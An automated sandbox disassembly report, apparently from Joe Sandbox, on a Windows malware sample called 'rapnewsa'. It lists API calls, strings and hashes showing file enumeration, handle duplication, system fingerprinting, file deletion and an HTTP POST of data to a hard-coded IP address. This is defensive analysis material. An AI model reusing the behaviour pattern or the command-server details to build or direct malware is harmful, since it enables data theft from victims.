12 API calls 2943->2946 2944 a4278e 2948 a41000 7 API calls 2944->2948 2947 a42686 2945->2947 2949 a42729 2946->2949 2950 a41ee0 RtlFreeHeap 2947->2950 2951 a427cc 2948->2951 2952 a41ee0 RtlFreeHeap 2949->2952 2950->2940 2953 a41ee0 RtlFreeHeap 2951->2953 2952->2940 2953->2940 2954->2942 2955->2943 2956->2944 2920 a42c09 2921 a42cd5 2920->2921 2928 a42c16 2920->2928 2922 a42c9c 2921->2922 2923 a42d29 2921->2923 2925 a42d08 2921->2925 2924 a42060 2 API calls 2923->2924 2924->2922 2926 a41ee0 RtlFreeHeap 2925->2926 2926->2922 2927 a42c88 2927->2922 2929 a42c94 ExitProcess 2927->2929 2928->2922 2928->2927 2930 
a42c9e 2928->2930 2930->2922 2931 a42cbc ExitProcess 2930->2931 2963 a4177a 2965 a4174c 2963->2965 2964 a417e0 3 API calls 2964->2965 2965->2964 2966 a417b5 2965->2966

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00A41EA0: RtlAllocateHeap.NTDLL(02D10000,00000008,00A43D82), ref: 00A41EB0
                            • NtQuerySystemInformation.NTDLL(00000010,?,00001000,00000000), ref: 00A414A9
                            • OpenProcess.KERNEL32(00000040,00000000,?), ref: 00A41523
                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00A4154B
                            • DuplicateHandle.KERNELBASE(000000FF,?,00000000), ref: 00A41565
                            • GetFileType.KERNELBASE(000000FF), ref: 00A4157F
                            • CloseHandle.KERNEL32(000000FF), ref: 00A4159E
                            • GetCurrentProcess.KERNEL32(000000FF,00000000,00000000,00000001), ref: 00A415AE
                            • DuplicateHandle.KERNEL32(000000FF,?,00000000), ref: 00A415C8
                            • CloseHandle.KERNEL32(000000FF), ref: 00A415DC
                            • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00A415EF
                              • Part of subcall function 00A41EE0: RtlFreeHeap.NTDLL(02D10000,00000000,00000000,02B30000), ref: 00A41EFE
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: Handle$CloseProcess$CurrentDuplicateHeap$AllocateChangeFileFindFreeInformationNotificationOpenQuerySystemType
                            • String ID:
                            • API String ID: 2769610337-0
                            • Opcode ID: fd6aa161e0d80b5519a59bb3628f33ac5b17f014e103464d959a4a8d28221bbd
                            • Instruction ID: 1b0cab2d510d9c76de5f39f97e33f48bb92bb0f1fc2b05076e2f54d890fae307
                            • Opcode Fuzzy Hash: fd6aa161e0d80b5519a59bb3628f33ac5b17f014e103464d959a4a8d28221bbd
                            • Instruction Fuzzy Hash: C65131B9D00209EFDB14CFD8D985FAEB7B5BBC8305F204258E612A7280D775DA81CB65

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph: rendered graph omitted. Function a48d40-a48ed8; subcalls a41ea0, a42360, a42250, a41380, a41110, a48d40 (recursive), a41ee0; APIs FindFirstFileW, FindNextFileW, FindClose.
                            APIs
                              • Part of subcall function 00A41EA0: RtlAllocateHeap.NTDLL(02D10000,00000008,00A43D82), ref: 00A41EB0
                            • FindFirstFileW.KERNELBASE(00000000,?), ref: 00A48D83
                            • FindNextFileW.KERNELBASE(000000FF,?), ref: 00A48EB1
                            • FindClose.KERNEL32(000000FF), ref: 00A48EC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: Find$File$AllocateCloseFirstHeapNext
                            • String ID: %s\%s$%s\*
                            • API String ID: 2963102669-2848263008
                            • Opcode ID: 32b42eaf44f60c808820763517806159251bae62e44583c66691798474867edf
                            • Instruction ID: b3df9d9fbe8acad6508b45b086434343f1f43feb3077886ef467e680e11e79f0
                            • Opcode Fuzzy Hash: 32b42eaf44f60c808820763517806159251bae62e44583c66691798474867edf
                            • Instruction Fuzzy Hash: F641C1B9D00218EBCB14DFA4DD56AEF77B5AFC8300F1085A8F91597281EA39DB41DB60

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph: rendered graph omitted. Function a417e0-a41a1c; subcalls a42130, a490f0; APIs GlobalHandle, LoadLibraryA, GetProcAddress.
                            APIs
                            • GlobalHandle.KERNEL32(00000000), ref: 00A418C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: GlobalHandle
                            • String ID: l
                            • API String ID: 1075865800-2517025534
                            • Opcode ID: e85a4c9461a0fb04610a2dc7d5e8d99657e82eb4971424b3b2bc0538daffab49
                            • Instruction ID: 499cbae571a064fa8163161ba1c2fe0521f8cd441d8e10b5b438a8c4dc5ff3d7
                            • Opcode Fuzzy Hash: e85a4c9461a0fb04610a2dc7d5e8d99657e82eb4971424b3b2bc0538daffab49
                            • Instruction Fuzzy Hash: 3A919678E05209DFCF04CF98D590AADBBB2FF89308F248199D915A7345D730AA91DF94
                            APIs
                            • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,00A43271,00A43147), ref: 00A48CAA
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: InfoSystem
                            • String ID:
                            • API String ID: 31276548-0
                            • Opcode ID: 3c3ada10847c12af956f9bcc9d0b3babe23114e369b6df29cdd35786c62df84d
                            • Instruction ID: ef6c3b850877cafdd96a9aa049b81144398ba9d4e9a36419995bf509644cdd3d
                            • Opcode Fuzzy Hash: 3c3ada10847c12af956f9bcc9d0b3babe23114e369b6df29cdd35786c62df84d
                            • Instruction Fuzzy Hash: 51D0C97890520C9BCB04DFD5D94989AB7FDAB88205F1085A5DD4957300EA32AA568BD1
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: ef4ba2a5f8b20fe9ebf94c7ad4fd4042bc574524729372173bfe9cd158506bc7
                            • Instruction ID: 335bcec336d09bce9cf10e8872e98f95a174684297b753749333d47cadc65724
                            • Opcode Fuzzy Hash: ef4ba2a5f8b20fe9ebf94c7ad4fd4042bc574524729372173bfe9cd158506bc7
                            • Instruction Fuzzy Hash: E741F33DA04205EBDB14CFA8D952B69B7B69BC5300F2082A8E5014F7D9D736DF42CB60

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph: rendered graph omitted. Function a42810-a4291f; API CreateThread (called at two sites).
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0u$0u0u$0u0u$45.125.66.18$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.4$`
                            • API String ID: 0-2265949662
                            • Opcode ID: 0c18c2d5237ec17a53f53b42016c780b469e825eafd8b2eb4dfe179192d33c82
                            • Instruction ID: 6058e133df44a7fec3ea0facb2a608e3289d0468fc838ff403f9e23044bf677c
                            • Opcode Fuzzy Hash: 0c18c2d5237ec17a53f53b42016c780b469e825eafd8b2eb4dfe179192d33c82
                            • Instruction Fuzzy Hash: A4310579640208BFE710CF94CC46FA97B75BB88701F608154FA099F2D1C3B5AA86CB95

                            Control-flow Graph

                            APIs
                            • CreateMutexA.KERNELBASE(00000000,00000000,082e2202-17f7-4654-a651-ac9a3778e1d7), ref: 00A41D43
                            • GetLastError.KERNEL32 ref: 00A41D52
                            • Sleep.KERNELBASE(00001388), ref: 00A41E1C
                            • CloseHandle.KERNEL32(00000000), ref: 00A41E3A
                            • ExitProcess.KERNEL32 ref: 00A41E42
                            Strings
                            • 082e2202-17f7-4654-a651-ac9a3778e1d7, xrefs: 00A41D3A
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: CloseCreateErrorExitHandleLastMutexProcessSleep
                            • String ID: 082e2202-17f7-4654-a651-ac9a3778e1d7
                            • API String ID: 168847217-1460249064
                            • Opcode ID: a98019ffa38849468887a309582a94e6358f80fca8d8fc8db891681b2ecdf95f
                            • Instruction ID: 18fb45ee3589ce845423bfb98409cb849d4bb99b8ba413ecc97b499f4466eb49
                            • Opcode Fuzzy Hash: a98019ffa38849468887a309582a94e6358f80fca8d8fc8db891681b2ecdf95f
                            • Instruction Fuzzy Hash: 4F31F4BDD00219EBDF64DBA4DD46BEE77B1ABD4300F100065E805B2181DB759E85DBA2

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph: rendered graph omitted. Function a42e60-a430b2; subcalls a491d0, a42920, a41ea0; API Sleep.
                            APIs
                            • Sleep.KERNELBASE(000003E8), ref: 00A430A4
                              • Part of subcall function 00A41EA0: RtlAllocateHeap.NTDLL(02D10000,00000008,00A43D82), ref: 00A41EB0
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: AllocateHeapSleep
                            • String ID: /api/receiver/recv$Content-Type: application/octet-stream$POST
                            • API String ID: 4201116106-1595302217
                            • Opcode ID: 84b811eaa6188ee5064e0e697ba8e5d6cb6f909eed4bf66449d4a8f3c7a6ab0d
                            • Instruction ID: bc65c40130024a65ec61b3f1dd3c25b62f70c1359b436aa8a09c04a1cc817ba4
                            • Opcode Fuzzy Hash: 84b811eaa6188ee5064e0e697ba8e5d6cb6f909eed4bf66449d4a8f3c7a6ab0d
                            • Instruction Fuzzy Hash: 5C713AB8A00219EBCB14CF84D544BB9BBB1FF88714F608598F9465B381D775EE81DBA0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph: rendered graph omitted. Function a43ef0-a43f62; API VirtualAlloc (called at three sites).
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,00000015,00003000,00000040,?,00A43D5B,?,00A41D86,?), ref: 00A43EFE
                            • VirtualAlloc.KERNELBASE(00000000,00000015,00003000,00000040,?,00A43D5B,?,00A41D86,?), ref: 00A43F21
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: b81513b619e466ffb39c44f52ef87cde176ef5dfacb95810ecad9797b183b6b8
                            • Instruction ID: 425d2330e1ef7058121c59b17608fe1880eae397844fd1f7c536348ffee350d3
                            • Opcode Fuzzy Hash: b81513b619e466ffb39c44f52ef87cde176ef5dfacb95810ecad9797b183b6b8
                            • Instruction Fuzzy Hash: E1F0303DAA9304EEFB209BE9AC5EB1135B453CAB17F101414B306AD1D0E3B6D6468A25

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph: rendered graph omitted. Function a42c09-a42da9; subcalls a491d0, a42060, a41ee0; API ExitProcess (called at two sites).
                            APIs
                              • Part of subcall function 00A491D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A491FE
                            • ExitProcess.KERNEL32 ref: 00A42C96
                            • ExitProcess.KERNEL32 ref: 00A42CBE
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: ExitProcess$Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID:
                            • API String ID: 2431947247-0
                            • Opcode ID: c4559ae39af4f2e81a8d04b8c7fd3d94c09c3f6da31a2ddf381203522413d03b
                            • Instruction ID: fbbe51cc375775a1013879d39254bb091fc03f15a751a7305614a2d44f54ecc1
                            • Opcode Fuzzy Hash: c4559ae39af4f2e81a8d04b8c7fd3d94c09c3f6da31a2ddf381203522413d03b
                            • Instruction Fuzzy Hash: 6B511978900208EFDB58CF84C998FAEB7B1BF88305F608298E5055B291C775EE81DF90

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 239 a48cc0-a48cd2 GetPhysicallyInstalledSystemMemory 240 a48cd4-a48ceb call a49260 239->240 241 a48cf2-a48cf5 239->241 240->241
                            APIs
                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(00A43265,00A43265,00A43147,?,?,?,?,?,?,?,?,?,00A43147), ref: 00A48CCA
                            • __aulldiv.LIBCMT ref: 00A48CE3
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: InstalledMemoryPhysicallySystem__aulldiv
                            • String ID:
                            • API String ID: 3833932492-0
                            • Opcode ID: 65d05738c648c6e555e4072c6ebc5691252314688422b34a0d9f2a20b6d13689
                            • Instruction ID: e9bbe1eaec58e98df3d60df51e33dd610aac218bacf108331fb9179e93742775
                            • Opcode Fuzzy Hash: 65d05738c648c6e555e4072c6ebc5691252314688422b34a0d9f2a20b6d13689
                            • Instruction Fuzzy Hash: BAE08C3C604208B7CB00DFE0DC45B9B777CAB88701F0081A8B908A7280DF71AA01C7E5

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 244 a48c70-a48c96 KiUserCallbackDispatcher GetSystemMetrics
                            APIs
                            • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00A48C75
                            • GetSystemMetrics.USER32(00000001), ref: 00A48C86
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: CallbackDispatcherMetricsSystemUser
                            • String ID:
                            • API String ID: 365337688-0
                            • Opcode ID: 8e4a8a1e6e571ccc9cb2e8f178e1a75fe9f48341829b39c7d62cde66ecf8e43e
                            • Instruction ID: abb2c4728ca3ba88a6bfc6fa4d0ce89c7a0d4fb107c14564e98ec0b66615b55e
                            • Opcode Fuzzy Hash: 8e4a8a1e6e571ccc9cb2e8f178e1a75fe9f48341829b39c7d62cde66ecf8e43e
                            • Instruction Fuzzy Hash: D4D09238184308AFD700DF90D809B94BBA8FB99751F10C166ED4D4A381DAB255428AE2

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 245 a41110-a41127 246 a412e5-a412e8 245->246 247 a4112d-a41187 call a42170 call a42250 call a490f0 245->247 254 a411b0-a411b4 247->254 255 a41189-a411ab call a436d0 247->255 257 a411bf-a411c9 254->257 260 a412d9-a412e2 call a41ee0 255->260 259 a411cf-a411e1 257->259 257->260 262 a411e5-a411fa 259->262 263 a411e3 259->263 260->246 266 a411fc-a41200 262->266 267 a41238-a4123c 262->267 263->257 266->267 270 a41202-a41209 call a490b0 266->270 268 a41254-a41268 267->268 269 a4123e-a41252 267->269 272 a412d4 268->272 273 a4126a-a4127e 268->273 269->268 271 a41280-a412ba call a436d0 269->271 276 a4120e-a41218 270->276 280 a412d2 271->280 281 a412bc-a412c6 271->281 272->260 273->271 273->272 276->267 278 a4121a-a41235 call a42250 call a490f0 276->278 278->267 280->260 281->280 283 a412c8-a412cc DeleteFileW 281->283 283->280
                            APIs
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: DeleteFile
                            • String ID:
                            • API String ID: 4033686569-0
                            • Opcode ID: 2d10f2d79bb612a7440f1d9a7777dc0d984a8afce800c57ec960e6c2f3209c68
                            • Instruction ID: 33951e69f811807f796a64a96b6e661815bb138a4dbde6623ec2a37e697824d8
                            • Opcode Fuzzy Hash: 2d10f2d79bb612a7440f1d9a7777dc0d984a8afce800c57ec960e6c2f3209c68
                            • Instruction Fuzzy Hash: D151B878D04258ABCB04DF94C490BEEBBB6AFC5314F1482A8E955DB342C735EB91CB51

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 286 a41060-a41083 287 a410a4-a410c3 call a48d40 286->287 288 a41085-a4109e SHGetFolderPathW 286->288 290 a410c8-a410cf 287->290 288->287 291 a410d1-a410f6 call a41ec0 call a42b10 290->291 292 a410fd-a41100 290->292 291->292
                            APIs
                            • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,-00000209), ref: 00A4109E
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: FolderPath
                            • String ID:
                            • API String ID: 1514166925-0
                            • Opcode ID: 3be02484de1c9b5ed50946bd5dbd0d3d6e922b8c3cd9eed904d3039bdaa1d034
                            • Instruction ID: e795439392213901542d5829145adeef8b79eb04184564e35356b9008f47eb04
                            • Opcode Fuzzy Hash: 3be02484de1c9b5ed50946bd5dbd0d3d6e922b8c3cd9eed904d3039bdaa1d034
                            • Instruction Fuzzy Hash: C51142B9A00208BBDB00DF98C856FEE7775EB84714F14C168FA285B282D6769A41CB90

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 297 a412f0-a41305 298 a41327-a41353 call a48d40 297->298 299 a41307-a41321 SHGetFolderPathW 297->299 302 a41355-a41361 call a43a20 298->302 303 a41370-a41373 298->303 299->298 305 a41366-a41369 302->305 305->303
                            APIs
                            • SHGetFolderPathW.SHELL32(00000000,10428910,00000000,00000000,00A42520), ref: 00A41321
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: FolderPath
                            • String ID:
                            • API String ID: 1514166925-0
                            • Opcode ID: 90b198d04e0431bcd8fa6dacb601b8af66b9f070e2e4b6c233814d1fe09f5296
                            • Instruction ID: 6b4f17cee7a2c82d35b2db89fa00b2829ca1e68e8ff69320681685180f98f25b
                            • Opcode Fuzzy Hash: 90b198d04e0431bcd8fa6dacb601b8af66b9f070e2e4b6c233814d1fe09f5296
                            • Instruction Fuzzy Hash: B50171B9600208BFDB44DF84CC55FEA7368EB84314F14C2A8FA194F2C2D675AE40CB94

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 306 a48b90-a48ba8 GetCurrentHwProfileA 307 a48bfa-a48bfd 306->307 308 a48baa-a48bb1 306->308 309 a48bd3-a48bdd 308->309 310 a48bb3-a48bd1 call a41f10 308->310 309->307 312 a48bdf-a48bf7 call a41f10 309->312 310->307 312->307
                            APIs
                            • GetCurrentHwProfileA.ADVAPI32(?), ref: 00A48BA0
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: CurrentProfile
                            • String ID:
                            • API String ID: 2104809126-0
                            • Opcode ID: 123e974a487d2a895cd472b501c38c1945f1095de219a5fdf0142504f77ce1c5
                            • Instruction ID: 0e10a9170fa47ba6f163587a69d21715fd3dd3848ba09caa7c1b8636844416c4
                            • Opcode Fuzzy Hash: 123e974a487d2a895cd472b501c38c1945f1095de219a5fdf0142504f77ce1c5
                            • Instruction Fuzzy Hash: 72F0A4B890011CABCF14CB64E891BBE7B79EB84304F14C169FA4597245EB39DB458B51
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c1763a0966187b7fe69525bfce067fe97491bddb1df38c92481f8c84455354e1
                            • Instruction ID: 630966722a05dd9bca3e1aa9becdd67f5154c52bc52aa2fc716a8d9c5dc56df6
                            • Opcode Fuzzy Hash: c1763a0966187b7fe69525bfce067fe97491bddb1df38c92481f8c84455354e1
                            • Instruction Fuzzy Hash: 6EE01ABE910208ABEB009FA4D845BAA37E8ABC8765F40C414B91A8B151D776DD80CBA1
                            APIs
                            • ExitProcess.KERNEL32 ref: 00A41CD0
                              • Part of subcall function 00A41E50: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,00A41CB1,?,00A41D86,?), ref: 00A41E59
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
